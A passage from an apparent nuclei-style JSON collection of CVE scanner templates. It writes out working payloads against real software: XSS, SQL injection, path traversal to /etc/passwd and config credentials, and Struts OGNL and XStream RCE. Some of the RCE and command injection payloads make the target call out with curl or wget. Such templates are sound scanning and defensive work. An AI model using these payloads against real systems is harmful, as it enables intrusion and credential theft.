\"onanimationstart=alert(document.domain)//\")","contains(body_2, \"Custom 404 Pro\")"],"condition":"and"}]}]},{"id":"CVE-2023-23492","info":{"name":"Login with Phone Number - Cross-Site Scripting","severity":"high"},"requests":[{"method":"GET","path":["{{BaseURL}}/wp-admin/admin-ajax.php?action=lwp_forgot_password&ID=<svg%20onload=alert(document.domain)>"],"matchers-condition":"and","matchers":[{"type":"word","part":"body","words":["<svg onload=alert(document.domain)>","message\":\"Update password"],"condition":"and"},{"type":"word","part":"header","words":["text/html"]},{"type":"status","status":[200]}]}]},{"id":"CVE-2023-23752","info":{"name":"Joomla! Webservice - Password Disclosure","severity":"medium"},"requests":[{"method":"GET","path":["{{BaseURL}}/api/index.php/v1/config/application?public=true","{{BaseURL}}/api/v1/config/application?public=true"],"stop-at-first-match":true,"matchers-condition":"and","matchers":[{"type":"word","part":"body","words":["\"links\":","\"attributes\":"],"condition":"and"},{"type":"word","part":"header","words":["application/json","application/vnd.api+json"],"condition":"or"},{"type":"status","status":[200]}]}]},{"id":"CVE-2023-35078","info":{"name":"Ivanti Endpoint Manager Mobile (EPMM) - Authentication Bypass","severity":"critical"},"requests":[{"method":"GET","path":["{{BaseURL}}/mifs/aad/api/v2/admins/users"],"max-size":100,"matchers":[{"type":"dsl","dsl":["contains_all(body, 'results','userId','name')","contains(header, 'application/json')","status_code == 200"],"condition":"and"}]}]},{"id":"CVE-2023-33338","info":{"name":"Old Age Home Management System v1.0 - SQL Injection","severity":"critical"},"requests":[{"raw":["POST /admin/login.php HTTP/1.1\nHost: {{Hostname}}\nContent-Type: application/x-www-form-urlencoded\n\nusername=vaday%27+or+1%3D1%23&password=password&submit=\n","GET /admin/dashboard.php HTTP/1.1\nHost: {{Hostname}}\n"],"cookie-reuse":true,"matchers":[{"type":"dsl","dsl":["status_code_2 == 200","contains(body_2, \"Change Password\")","contains(body_2, \"Old Age Home Management System|| Dashboard\")"],"condition":"and"}]}]},{"id":"CVE-2023-3479","info":{"name":"Hestiacp <= 1.7.8 - Cross-Site Scripting","severity":"medium"},"requests":[{"method":"GET","path":["{{BaseURL}}/templates/pages/debug_panel.php?id={{randstr}}\"><script>alert(document.domain)</script>"],"matchers-condition":"and","matchers":[{"type":"word","part":"body","words":["debug-panel","<script>alert(document.domain)</script>"],"condition":"and"},{"type":"word","part":"header","words":["text/html"]},{"type":"status","status":[200]}]}]},{"id":"CVE-2013-2248","info":{"name":"Apache Struts - Multiple Open Redirection Vulnerabilities","severity":"medium"},"requests":[{"method":"GET","path":["{{BaseURL}}/index.action?redirect:http://www.interact.sh/"],"matchers":[{"type":"regex","part":"header","regex":["(?m)^(?:Location\\s*?:\\s*?)(?:https?://|//)?(?:[a-zA-Z0-9\\-_\\.@]*)interact\\.sh.*$"]}]}]},{"id":"CVE-2013-7091","info":{"name":"Zimbra Collaboration Server 7.2.2/8.0.2 Local File Inclusion","severity":"medium"},"requests":[{"method":"GET","path":["{{BaseURL}}/res/I18nMsg,AjxMsg,ZMsg,ZmMsg,AjxKeys,ZmKeys,ZdMsg,Ajx%20TemplateMsg.js.zgz?v=091214175450&skin=../../../../../../../../../opt/zimbra/conf/localconfig.xml%00","{{BaseURL}}/res/I18nMsg,AjxMsg,ZMsg,ZmMsg,AjxKeys,ZmKeys,ZdMsg,Ajx%20TemplateMsg.js.zgz?v=091214175450&skin=../../../../../../../../../etc/passwd%00"],"stop-at-first-match":true,"matchers-condition":"or","matchers":[{"type":"word","words":["zimbra_server_hostname","zimbra_ldap_userdn","zimbra_ldap_password","ldap_postfix_password","ldap_amavis_password","ldap_nginx_password","mysql_root_password"],"condition":"or"},{"type":"regex","regex":["root=.*:0:0"]}]}]},{"id":"CVE-2013-7240","info":{"name":"WordPress Plugin Advanced Dewplayer 1.2 - Directory Traversal","severity":"medium"},"requests":[{"method":"GET","path":["{{BaseURL}}/wp-content/plugins/advanced-dewplayer/admin-panel/download-file.php?dew_file=../../../../wp-config.php"],"matchers-condition":"and","matchers":[{"type":"word","part":"body","words":["DB_NAME","DB_PASSWORD","DB_HOST","The base configurations of the WordPress"],"condition":"and"},{"type":"status","status":[200]}]}]},{"id":"CVE-2013-2287","info":{"name":"WordPress Plugin Uploader 1.0.4 - Cross-Site Scripting","severity":"medium"},"requests":[{"method":"GET","path":["{{BaseURL}}/wp-content/plugins/uploader/views/notify.php?notify=unnotif&blog=%3C%2Fscript%3E%3Cscript%3Ealert%28document.domain%29%3C%2Fscript%3E"],"matchers-condition":"and","matchers":[{"type":"word","part":"body","words":["</script><script>alert(document.domain)</script>"]},{"type":"word","part":"header","words":["text/html"]},{"type":"status","status":[200]}]}]},{"id":"CVE-2013-4117","info":{"name":"WordPress Plugin Category Grid View Gallery 2.3.1 - Cross-Site Scripting","severity":"medium"},"requests":[{"method":"GET","path":["{{BaseURL}}/wp-content/plugins/category-grid-view-gallery/includes/CatGridPost.php?ID=1%3C%2Fscript%3E%3Cscript%3Ealert%28document.domain%29%3C%2Fscript%3E"],"matchers-condition":"and","matchers":[{"type":"word","part":"body","words":["</script><script>alert(document.domain)</script>"]},{"type":"word","part":"header","words":["text/html"]},{"type":"status","status":[200]}]}]},{"id":"CVE-2013-5528","info":{"name":"Cisco Unified Communications Manager 7/8/9 - Directory Traversal","severity":"medium"},"requests":[{"method":"GET","path":["{{BaseURL}}/ccmadmin/bulkvivewfilecontents.do?filetype=samplefile&fileName=../../../../../../../../../../../../../../../../etc/passwd"],"matchers-condition":"and","matchers":[{"type":"regex","regex":["root:.*:0:0:"]},{"type":"status","status":[200]}]}]},{"id":"CVE-2013-2251","info":{"name":"Apache Struts 2 - DefaultActionMapper Prefixes OGNL Code Execution","severity":"critical"},"requests":[{"raw":["GET /index.action?{{params}}:${%23a%3d(new%20java.lang.ProcessBuilder(new%20java.lang.String[]{'sh','-c','id'})).start(),%23b%3d%23a.getInputStream(),%23c%3dnew%20java.io.InputStreamReader(%23b),%23d%3dnew%20java.io.BufferedReader(%23c),%23e%3dnew%20char[50000],%23d.read(%23e),%23matt%3d%23context.get(%27com.opensymphony.xwork2.dispatcher.HttpServletResponse%27),%23matt.getWriter().println(%23e),%23matt.getWriter().flush(),%23matt.getWriter().close()} HTTP/1.1\nHost: {{Hostname}}\nAccept: */*\n","GET /login.action?{{params}}:${%23a%3d(new%20java.lang.ProcessBuilder(new%20java.lang.String[]{'sh','-c','id'})).start(),%23b%3d%23a.getInputStream(),%23c%3dnew%20java.io.InputStreamReader(%23b),%23d%3dnew%20java.io.BufferedReader(%23c),%23e%3dnew%20char[50000],%23d.read(%23e),%23matt%3d%23context.get(%27com.opensymphony.xwork2.dispatcher.HttpServletResponse%27),%23matt.getWriter().println(%23e),%23matt.getWriter().flush(),%23matt.getWriter().close()} HTTP/1.1\nHost: {{Hostname}}\nAccept: */*\n","GET /index.action?{{params}}%3A%24%7B%23context%5B%22xwork.MethodAccessor.denyMethodExecution%22%5D%3Dfalse%2C%23f%3D%23%5FmemberAccess.getClass().getDeclaredField(%22allowStaticMethodAccess%22)%2C%23f.setAccessible(true)%2C%23f.set(%23%5FmemberAccess%2Ctrue)%2C%23a%3D%40java.lang.Runtime%40getRuntime().exec(%22sh%20-c%20id%22).getInputStream()%2C%23b%3Dnew%20java.io.InputStreamReader(%23a)%2C%23c%3Dnew%20java.io.BufferedReader(%23b)%2C%23d%3Dnew%20char%5B5000%5D%2C%23c.read(%23d)%2C%23genxor%3D%23context.get(%22com.opensymphony.xwork2.dispatcher.HttpServletResponse%22).getWriter()%2C%23genxor.println(%23d)%2C%23genxor.flush()%2C%23genxor.close()%7D HTTP/1.1\nHost: {{Hostname}}\nAccept: */*\n"],"payloads":{"params":["redirect","action","redirectAction"]},"matchers-condition":"and","matchers":[{"type":"regex","part":"body","regex":["((u|g)id|groups)=[0-9]{1,4}\\([a-z0-9]+\\)"]},{"type":"status","status":[200,400],"condition":"or"}]}]},{"id":"CVE-2013-1965","info":{"name":"Apache Struts2 S2-012 RCE","severity":"critical"},"requests":[{"method":"POST","path":["{{BaseURL}}/user.action"],"body":"name=%25%7B%23a%3D%28new+java.lang.ProcessBuilder%28new+java.lang.String%5B%5D%7B%22cat%22%2C+%22%2Fetc%2Fpasswd%22%7D%29%29.redirectErrorStream%28true%29.start%28%29%2C%23b%3D%23a.getInputStream%28%29%2C%23c%3Dnew+java.io.InputStreamReader%28%23b%29%2C%23d%3Dnew+java.io.BufferedReader%28%23c%29%2C%23e%3Dnew+char%5B50000%5D%2C%23d.read%28%23e%29%2C%23f%3D%23context.get%28%22com.opensymphony.xwork2.dispatcher.HttpServletResponse%22%29%2C%23f.getWriter%28%29.println%28new+java.lang.String%28%23e%29%29%2C%23f.getWriter%28%29.flush%28%29%2C%23f.getWriter%28%29.close%28%29%7D\n","headers":{"Content-Type":"application/x-www-form-urlencoded"},"matchers-condition":"and","matchers":[{"type":"regex","regex":["root:.*:0:0:"]},{"type":"status","status":[200]}]}]},{"id":"CVE-2013-5979","info":{"name":"Xibo 1.2.2/1.4.1 - Directory Traversal","severity":"medium"},"requests":[{"method":"GET","path":["{{BaseURL}}/index.php?p=../../../../../../../../../../../../../../../../etc/passwd%00index&q=About&ajax=true&_=1355714673828"],"matchers-condition":"and","matchers":[{"type":"regex","regex":["root:.*:0:0:"]},{"type":"status","status":[200]}]}]},{"id":"CVE-2013-3526","info":{"name":"WordPress Plugin Traffic Analyzer - 'aoid' Cross-Site Scripting","severity":"medium"},"requests":[{"method":"GET","path":["{{BaseURL}}/wp-content/plugins/trafficanalyzer/js/ta_loaded.js.php?aoid=%3Cscript%3Ealert(1)%3C%2Fscript%3E"],"matchers-condition":"and","matchers":[{"type":"word","part":"body","words":["<script>alert(1)</script>"]},{"type":"word","part":"header","words":["text/html"]},{"type":"status","status":[200]}]}]},{"id":"CVE-2013-4625","info":{"name":"WordPress Plugin Duplicator < 0.4.5 - Cross-Site Scripting","severity":"medium"},"requests":[{"method":"GET","path":["{{BaseURL}}/wp-content/plugins/duplicator/files/installer.cleanup.php?remove=1&package=%3C%2Fscript%3E%3Cscript%3Ealert%28document.domain%29%3C%2Fscript%3E"],"matchers-condition":"and","matchers":[{"type":"word","part":"body","words":["</script><script>alert(document.domain)</script>"]},{"type":"word","part":"header","words":["text/html"]},{"type":"status","status":[200]}]}]},{"id":"CVE-2013-2621","info":{"name":"Telaen => v1.3.1 - Open Redirect","severity":"medium"},"requests":[{"method":"GET","path":["{{BaseURL}}/telaen/redir.php?https://interact.sh","{{BaseURL}}/redir.php?https://interact.sh"],"stop-at-first-match":true,"matchers-condition":"and","matchers":[{"type":"regex","part":"header","regex":["(?m)^(?:Location\\s*?:\\s*?)(?:https?://|//)(?:[a-zA-Z0-9\\-_\\.@]*)interact\\.sh.*$"]}]}]},{"id":"CVE-2013-6281","info":{"name":"WordPress Spreadsheet - Cross-Site Scripting","severity":"medium"},"requests":[{"raw":["GET /wp-content/plugins/dhtmlxspreadsheet/codebase/spreadsheet.php?page=%3Cscript%3Ealert(document.domain)%3C/script%3E HTTP/1.1\nHost: {{Hostname}}\n"],"matchers-condition":"and","matchers":[{"type":"word","part":"body","words":["page: '<script>alert(document.domain)</script>'","dhx_rel_path"],"condition":"and"},{"type":"word","part":"header","words":["text/html"]},{"type":"status","status":[200]}]}]},{"id":"CVE-2013-3827","info":{"name":"Javafaces LFI","severity":"medium"},"requests":[{"method":"GET","path":["{{BaseURL}}/costModule/faces/javax.faces.resource/web.xml?loc=../WEB-INF","{{BaseURL}}/costModule/faces/javax.faces.resource./WEB-INF/web.xml.jsf?ln=..","{{BaseURL}}/faces/javax.faces.resource/web.xml?loc=../WEB-INF","{{BaseURL}}/faces/javax.faces.resource./WEB-INF/web.xml.jsf?ln=..","{{BaseURL}}/secureader/javax.faces.resource/web.xml?loc=../WEB-INF","{{BaseURL}}/secureader/javax.faces.resource./WEB-INF/web.xml.jsf?ln=..","{{BaseURL}}/myaccount/javax.faces.resource/web.xml?loc=../WEB-INF","{{BaseURL}}/myaccount/javax.faces.resource./WEB-INF/web.xml.jsf?ln=..","{{BaseURL}}/SupportPortlet/faces/javax.faces.resource/web.xml?loc=../WEB-INF","{{BaseURL}}/SupportPortlet/faces/javax.faces.resource./WEB-INF/web.xml.jsf?ln=.."],"stop-at-first-match":true,"matchers-condition":"and","matchers":[{"type":"word","part":"body","words":["<web-app","</web-app>"],"condition":"and"},{"type":"status","status":[200]}]}]},{"id":"CVE-2013-7285","info":{"name":"XStream <1.4.6/1.4.10 - Remote Code Execution","severity":"critical"},"requests":[{"raw":["POST / HTTP/1.1\nHost: {{Hostname}}\nContent-Type: application/xml\n\n<sorted-set>\n    <string>foo</string>\n    <contact class='dynamic-proxy'>\n      <interface>java.lang.Comparable</interface>\n      <handler class='java.beans.EventHandler'>\n          <target class='java.lang.ProcessBuilder'>\n              <command>\n                <string>curl</string>\n                <string>http://{{interactsh-url}}</string>\n              </command>\n          </target>\n          <action>start</action>\n      </handler>\n  </contact>\n</sorted-set>\n"],"matchers-condition":"and","matchers":[{"type":"word","part":"interactsh_protocol","words":["http"]},{"type":"word","part":"interactsh_request","words":["User-Agent: curl"]}]}]},{"id":"CVE-2021-32172","info":{"name":"Maian Cart <=3.8 - Remote Code Execution","severity":"critical"},"requests":[{"raw":["GET /admin/index.php?p=ajax-ops&op=elfinder&cmd=mkfile&name={{randstr}}.php&target=l1_Lw HTTP/1.1\nHost: {{Hostname}}\nAccept: */*\n","POST /admin/index.php?p=ajax-ops&op=elfinder HTTP/1.1\nHost: {{Hostname}}\nAccept: application/json, text/javascript, /; q=0.01\nAccept-Language: en-US,en;q=0.5\nContent-Type: application/x-www-form-urlencoded; charset=UTF-8\n\ncmd=put&target={{hash}}&content=%3c%3fphp%20echo%20%22{{randstr_1}}%22%3b%20%3f%3e\n","GET /product-downloads/{{randstr}}.php HTTP/1.1\nHost: {{Hostname}}\nAccept: */*\n"],"req-condition":true,"matchers":[{"type":"dsl","dsl":["contains(body_3, \"{{randstr_1}}\")","status_code_3 == 200"],"condition":"and"}],"extractors":[{"type":"regex","name":"hash","group":1,"regex":["\"hash\"\\:\"(.*?)\"\\,"],"internal":true}]}]},{"id":"CVE-2021-33044","info":{"name":"Dahua IPC/VTH/VTO - Authentication Bypass","severity":"critical"},"requests":[{"raw":["POST /RPC2_Login HTTP/1.1\nHost: {{Hostname}}\nAccept: application/json, text/javascript, */*; q=0.01\nConnection: close\nX-Requested-With: XMLHttpRequest\nContent-Type: application/x-www-form-urlencoded; charset=UTF-8\nOrigin: {{BaseURL}}\nReferer: {{BaseURL}}\n\n{\"id\": 1, \"method\": \"global.login\", \"params\": {\"authorityType\": \"Default\", \"clientType\": \"NetKeyboard\", \"loginType\": \"Direct\", \"password\": \"Not Used\", \"passwordType\": \"Default\", \"userName\": \"admin\"}, \"session\": 0}\n"],"matchers-condition":"and","matchers":[{"type":"word","part":"body","words":["\"result\":true","id","params","session"],"condition":"and"},{"type":"status","status":[200]}],"extractors":[{"type":"regex","group":1,"regex":[",\"result\":true,\"session\":\"([a-z]+)\"\\}"],"part":"body"}]}]},{"id":"CVE-2021-35250","info":{"name":"SolarWinds Serv-U 15.3 - Directory Traversal","severity":"high"},"requests":[{"raw":["POST /?Command=NOOP&InternalFile=../../../../../../../../../../../../../../Windows/win.ini&NewWebClient=1 HTTP/1.1\nHost: {{Hostname}}\nContent-Type: application/x-www-form-urlencoded\n\n/?Command=NOOP\n"],"matchers-condition":"and","matchers":[{"type":"regex","part":"body","regex":["\\[(font|extension|file)s\\]"]},{"type":"status","status":[401]}]}]},{"id":"CVE-2021-24862","info":{"name":"WordPress RegistrationMagic <5.0.1.6 - Authenticated SQL Injection","severity":"high"},"requests":[{"raw":["POST /wp-login.php HTTP/1.1\nHost: {{Hostname}}\nContent-Type: application/x-www-form-urlencoded\n\nlog={{username}}&pwd={{password}}&wp-submit=Log+In\n","@timeout: 10s\nGET /wp-admin/admin-ajax.php?action=ays_sccp_results_export_file&sccp_id[]=3)%20AND%20(SELECT%205921%20FROM%20(SELECT(SLEEP(6)))LxjM)%20AND%20(7754=775&type=json HTTP/1.1\nHost: {{Hostname}}\n","GET /wp-content/plugins/custom-registration-form-builder-with-submission-manager/admin/js/script_rm_utilities.js HTTP/1.1\nHost: {{Hostname}}\n"],"cookie-reuse":true,"matchers":[{"type":"dsl","dsl":["duration_2>=6","status_code_2 == 200","contains(body_3, \"rm_user_role_mananger_form\")"],"condition":"and"}]}]},{"id":"CVE-2021-34429","info":{"name":"Eclipse Jetty - Information Disclosure","severity":"medium"},"requests":[{"raw":["GET /%u002e/WEB-INF/web.xml HTTP/1.1\nHost: {{Hostname}}\nOrigin: {{BaseURL}}\n\n","GET /.%00/WEB-INF/web.xml HTTP/1.1\nHost: {{Hostname}}\nOrigin: {{BaseURL}}\n\n"],"unsafe":true,"matchers-condition":"and","matchers":[{"type":"word","part":"body","words":["</web-app>","java.sun.com"],"condition":"and"},{"type":"word","part":"header","words":["application/xml"]},{"type":"status","status":[200]}]}]},{"id":"CVE-2021-34640","info":{"name":"WordPress Securimage-WP-Fixed <=3.5.4 - Cross-Site Scripting","severity":"medium"},"requests":[{"raw":["POST /wp-login.php HTTP/1.1\nHost: {{Hostname}}\nOrigin: {{RootURL}}\nContent-Type: application/x-www-form-urlencoded\nCookie: wordpress_test_cookie=WP%20Cookie%20check\n\nlog={{username}}&pwd={{password}}&wp-submit=Log+In&testcookie=1\n","GET //wp-admin/options-general.php/\"></script><script>alert(document.domain)</script>/script%3E?page=securimage-wp-options%2F HTTP/1.1\nHost: {{Hostname}}\n"],"cookie-reuse":true,"matchers-condition":"and","matchers":[{"type":"word","part":"body","words":["</script><script>alert(document.domain)</script>"]},{"type":"word","part":"header","words":["text/html"]},{"type":"status","status":[200]}]}]},{"id":"CVE-2021-31249","info":{"name":"CHIYU TCP/IP Converter - Carriage Return Line Feed Injection","severity":"medium"},"requests":[{"method":"GET","path":["{{BaseURL}}/man.cgi?redirect=setting.htm%0d%0a%0d%0a<script>alert(document.domain)</script>&failure=fail.htm&type=dev_name_apply&http_block=0&TF_ip0=192&TF_ip1=168&TF_ip2=200&TF_ip3=200&TF_port=&TF_port=&B_mac_apply=APPLY"],"matchers-condition":"and","matchers":[{"type":"word","part":"header","words":["Location: setting.htm","<script>alert(document.domain)</script>"],"condition":"and"},{"type":"status","status":[302]}]}]},{"id":"CVE-2021-24472","info":{"name":"Onair2 < 3.9.9.2 & KenthaRadio < 2.0.2 - Remote File Inclusion/Server-Side Request Forgery","severity":"critical"},"requests":[{"method":"GET","path":["{{BaseURL}}/wp1/home-18/?qtproxycall=https://oast.me"],"matchers-condition":"and","matchers":[{"type":"word","part":"body","words":["<h1> Interactsh Server </h1>"]},{"type":"status","status":[200]}]}]},{"id":"CVE-2021-26475","info":{"name":"EPrints 3.4.2 - Cross-Site Scripting","severity":"medium"},"requests":[{"method":"GET","path":["{{BaseURL}}/cgi/cal?year=2021%3C/title%3E%3Cscript%3Ealert(%27{{randstr}}%27)%3C/script%3E"],"matchers-condition":"and","matchers":[{"type":"word","words":["</title><script>alert('{{randstr}}')</script>"]},{"type":"word","part":"header","words":["text/html"]},{"type":"status","status":[200]}]}]},{"id":"CVE-2021-24387","info":{"name":"WordPress Pro Real Estate 7 Theme <3.1.1 - Cross-Site Scripting","severity":"medium"},"requests":[{"raw":["GET /?ct_mobile_keyword&ct_keyword&ct_city&ct_zipcode&search-listings=true&ct_price_from&ct_price_to&ct_beds_plus&ct_baths_plus&ct_sqft_from&ct_sqft_to&ct_lotsize_from&ct_lotsize_to&ct_year_from&ct_year_to&ct_community=%3Cscript%3Ealert%28document.domain%29%3B%3C%2Fscript%3E&ct_mls&ct_brokerage=0&lat&lng HTTP/1.1\nHost: {{Hostname}}\nAccept-Encoding: gzip, deflate\nAccept-Language: en-GB,en-US;q=0.9,en;q=0.8\nConnection: close\n"],"matchers-condition":"and","matchers":[{"type":"word","part":"body","words":["<script>alert(document.domain);</script>","/wp-content/themes/realestate"],"condition":"and"},{"type":"status","status":[200]}]}]},{"id":"CVE-2021-46379","info":{"name":"D-Link DIR850 ET850-1.08TRb03 - Open Redirect","severity":"medium"},"requests":[{"method":"GET","path":["{{BaseURL}}/boafrm/formWlanRedirect?redirect-url=http://interact.sh&wlan_id=1"],"matchers":[{"type":"regex","part":"header","regex":["(?m)^(?:Location\\s*?:\\s*?)(?:https?:\\/\\/|\\/\\/|\\/\\\\\\\\|\\/\\\\)(?:[a-zA-Z0-9\\-_\\.@]*)interact\\.sh\\/?(\\/|[^.].*)?$"]}]}]},{"id":"CVE-2021-27561","info":{"name":"YeaLink DM 3.6.0.20 - Remote Command Injection","severity":"critical"},"requests":[{"method":"GET","path":["{{BaseURL}}/premise/front/getPingData?url=http://0.0.0.0:9600/sm/api/v1/firewall/zone/services?zone=;/usr/bin/id;"],"matchers-condition":"and","matchers":[{"type":"word","part":"body","words":["uid","gid","groups"],"condition":"and"},{"type":"word","part":"header","words":["application/json"]},{"type":"status","status":[200]}],"extractors":[{"type":"regex","regex":["(u|g)id=.*"]}]}]},{"id":"CVE-2021-24291","info":{"name":"WordPress Photo Gallery by 10Web <1.5.69 - Cross-Site Scripting","severity":"medium"},"requests":[{"method":"GET","path":["{{BaseURL}}/wp-admin/admin-ajax.php?action=bwg_frontend_data&shortcode_id=1\"%20onmouseover=alert(document.domain)//"],"matchers-condition":"and","matchers":[{"type":"word","part":"header","words":["text/html"]},{"type":"word","words":["onmouseover=alert(document.domain)//","wp-content/uploads/photo-gallery"],"condition":"and"},{"type":"status","status":[200]}]}]},{"id":"CVE-2021-27309","info":{"name":"Clansphere CMS 2011.4 - Cross-Site Scripting","severity":"medium"},"requests":[{"method":"GET","path":["{{BaseURL}}/mods/clansphere/lang_modvalidate.php?language=language&module=module%22></script><script>alert(document.domain)</script>"],"matchers-condition":"and","matchers":[{"type":"word","part":"body","words":["\"></script><script>alert(document.domain)</script>.php"]},{"type":"word","part":"header","words":["text/html"]},{"type":"status","status":[200]}]}]},{"id":"CVE-2021-37216","info":{"name":"QSAN Storage Manager <3.3.3 - Cross-Site Scripting","severity":"medium"},"requests":[{"method":"GET","path":["{{BaseURL}}/http_header.php"],"headers":{"X-Trigger-XSS":"<script>alert(1)</script>"},"matchers-condition":"and","matchers":[{"type":"dsl","dsl":["!contains(tolower(header), 'x-xss-protection')"]},{"type":"word","part":"body","words":["\"HTTP_X_TRIGGER_XSS\":\"<script>alert(1)</script>\""]},{"type":"word","part":"header","words":["text/html"]}]}]},{"id":"CVE-2021-37833","info":{"name":"Hotel Druid 3.0.2 - Cross-Site Scripting","severity":"medium"},"requests":[{"method":"GET","path":["{{BaseURL}}/visualizza_tabelle.php?anno=2021&tipo_tabella=prenotazioni&sel_tab_prenota=tutte&wo03b%3C%2Fscript%3E%3Cscript%3Ealert%28document.domain%29%3C%2Fscript%3Ew5px3=1","{{BaseURL}}/storia_soldi.php?piu17%3C%2Fscript%3E%3Cscript%3Ealert%28document.domain%29%3C%2Fscript%3Ee3esq=1","{{BaseURL}}/tabella.php?jkuh3%3C%2Fscript%3E%3Cscript%3Ealert%28document.domain%29%3C%2Fscript%3Eyql8b=1","{{BaseURL}}/crea_modelli.php?anno=2021&id_sessione=&fonte_dati_conn=attuali&T_PHPR_DB_TYPE=postgresql&T_PHPR_DB_NAME=%C2%9E%C3%A9e&T_PHPR_DB_HOST=localhost&T_PHPR_DB_PORT=5432&T_PHPR_DB_USER=%C2%9E%C3%A9e&T_PHPR_DB_PASS=%C2%9E%C3%A9e&T_PHPR_LOAD_EXT=NO&T_PHPR_TAB_PRE=%C2%9E%C3%A9e&anno_modello=2021&lingua_modello=en&cambia_frasi=SIipq85%3C%2Fscript%3E%3Cscript%3Ealert%28document.domain%29%3C%2Fscript%3Ef9xkbujgt24&form_availability_calendar_template=1"],"stop-at-first-match":true,"matchers-condition":"and","matchers":[{"type":"word","part":"body","words":["</script><script>alert(document.domain)</script>"]},{"type":"word","part":"header","words":["text/html"]},{"type":"status","status":[200]}]}]},{"id":"CVE-2021-24407","info":{"name":"WordPress Jannah Theme <5.4.5 - Cross-Site Scripting","severity":"medium"},"requests":[{"raw":["POST /wp-admin/admin-ajax.php HTTP/1.1\nHost: {{Hostname}}\nAccept: */*\nContent-Type: application/x-www-form-urlencoded\n\naction=tie_ajax_search&query[]=</script><script>alert(document.domain)</script>\n"],"matchers-condition":"and","matchers":[{"type":"word","part":"body","words":["</script><script>alert(document.domain)</script>"]},{"type":"word","part":"header","words":["text/html"]},{"type":"status","status":[200]}]}]},{"id":"CVE-2021-25112","info":{"name":"WordPress WHMCS Bridge <6.4b - Cross-Site Scripting","severity":"medium"},"requests":[{"raw":["POST /wp-login.php HTTP/1.1\nHost: {{Hostname}}\nOrigin: {{RootURL}}\nContent-Type: application/x-www-form-urlencoded\nCookie: wordpress_test_cookie=WP%20Cookie%20check\n\nlog={{username}}&pwd={{password}}&wp-submit=Log+In&testcookie=1\n","GET /wp-admin/options-general.php?page=cc-ce-bridge-cp&error=%3Cimg%20src%20onerror=alert(document.domain)%3E HTTP/1.1\nHost: {{Hostname}}\n"],"cookie-reuse":true,"matchers-condition":"and","matchers":[{"type":"word","part":"body","words":["<strong><img src onerror=alert(document.domain)></strong>"]},{"type":"word","part":"header","words":["text/html"]},{"type":"status","status":[200]}]}]},{"id":"CVE-2021-21389","info":{"name":"BuddyPress REST API  <7.2.1 - Privilege Escalation/Remote Code Execution","severity":"high"},"requests":[{"raw":["POST /wp-json/buddypress/v1/signup HTTP/1.1\nHost: {{Hostname}}\nContent-Type: application/json; charset=UTF-8\n\n{\n  \"user_login\":\"{{randstr}}\",\n  \"password\":\"{{randstr}}\",\n  \"user_name\":\"{{randstr}}\",\n  \"user_email\":\"{{randstr}}@interact.sh\"\n}\n"],"matchers-condition":"and","matchers":[{"type":"word","part":"body","words":["user_login","registered","activation_key","user_email"],"condition":"and"},{"type":"word","part":"header","words":["application/json"]},{"type":"status","status":[200]}]}]},{"id":"CVE-2021-45380","info":{"name":"AppCMS - Cross-Site Scripting","severity":"medium"},"requests":[{"method":"GET","path":["{{BaseURL}}/templates/m/inc_head.php?q=%22%3e%3C%2Fscript%3E%3Cscript%3Ealert%28document.domain%29%3C%2Fscript%3E"],"matchers-condition":"and","matchers":[{"type":"word","part":"body","words":["\"\"></script><script>alert(document.domain)</script>"],"condition":"and"},{"type":"word","part":"header","words":["text/html"]},{"type":"status","status":[200]}]}]},{"id":"CVE-2021-28854","info":{"name":"VICIdial Sensitive Information Disclosure","severity":"high"},"requests":[{"method":"GET","path":["{{BaseURL}}/agc/vicidial_mysqli_errors.txt"],"matchers-condition":"and","matchers":[{"type":"word","words":["text/plain"],"part":"header"},{"type":"status","status":[200]},{"type":"word","words":["vdc_db_query"],"part":"body"}]}]},{"id":"CVE-2021-44451","info":{"name":"Apache Superset <=1.3.2 - Default Login","severity":"medium"},"requests":[{"raw":["GET /login/ HTTP/1.1\nHost: {{Hostname}}\n","POST /login/ HTTP/1.1\nHost: {{Hostname}}\nContent-Type: application/x-www-form-urlencoded\n\ncsrf_token={{csrf_token}}&username={{username}}&password={{password}}\n","GET /dashboard/list/ HTTP/1.1\nHost: {{Hostname}}\n"],"payloads":{"username":["admin"],"password":["admin"]},"attack":"pitchfork","cookie-reuse":true,"req-condition":true,"matchers-condition":"and","matchers":[{"type":"word","part":"header_2","words":["session"]},{"type":"word","part":"body_3","words":["DashboardFilterStateRestApi"]}],"extractors":[{"type":"regex","name":"csrf_token","group":1,"regex":["name=\"csrf_token\" type=\"hidden\" value=\"(.*)\""],"internal":true,"part":"body"}]}]},{"id":"CVE-2021-24946","info":{"name":"WordPress Modern Events Calendar <6.1.5 - Blind SQL Injection","severity":"critical"},"requests":[{"raw":["@timeout: 10s\nGET /wp-admin/admin-ajax.php?action=mec_load_single_page&time=1))%20UNION%20SELECT%20sleep(6)%20--%20g HTTP/1.1\nHost: {{Hostname}}\n"],"matchers":[{"type":"dsl","dsl":["duration>=6","status_code == 200 || status_code == 500","contains(content_type, \"text/html\")","contains(body, \"The event is finished\") || contains(body, \"been a critical error\")"],"condition":"and"}]}]},{"id":"CVE-2021-32305","info":{"name":"Websvn <2.6.1 - Remote Code Execution","severity":"critical"},"requests":[{"raw":["GET /search.php?search=%22;wget+http%3A%2F%2F{{interactsh-url}}%27;%22 HTTP/1.1\nHost: {{Hostname}}\nAccept-Encoding: gzip, deflate\nAccept: */*\n"],"matchers":[{"type":"word","part":"interactsh_protocol","words":["http"]}]}]},{"id":"CVE-2021-40960","info":{"name":"Galera WebTemplate 1.0 Directory Traversal","severity":"critical"},"requests":[{"method":"GET","path":["{{BaseURL}}/GallerySite/filesrc/fotoilan/388/middle//.%252e/.%252e/.%252e/.%252e/.%252e/.%252e/.%252e/etc/passwd"],"matchers-condition":"and","matchers":[{"type":"regex","regex":["root:.*:0:0:"]},{"type":"status","status":[200]}]}]},{"id":"CVE-2021-29505","info":{"name":"XStream <1.4.17 - Remote Code Execution","severity":"high"},"requests":[{"raw":["POST / HTTP/1.1\nHost: {{Hostname}}\nContent-Type: application/xml\n\n<java.util.PriorityQueue serialization='custom'>\n    <unserializable-parents/>\n    <java.util.PriorityQueue>\n        <default>\n            <size>2</size>\n        </default>\n        <int>3</int>\n        <javax.naming.ldap.Rdn_-RdnEntry>\n            <type>12345</type>\n            <value class='com.sun.org.apache.xpath.internal.objects.XString'>\n                <m__obj class='string'>com.sun.xml.internal.ws.api.message.Packet@2002fc1d Content</m__obj>\n            </value>\n        </javax.naming.ldap.Rdn_-RdnEntry>\n        <javax.naming.ldap.Rdn_-RdnEntry>\n            <type>12345</type>\n            <value class='com.sun.xml.internal.ws.api.message.Packet' serialization='custom'>\n                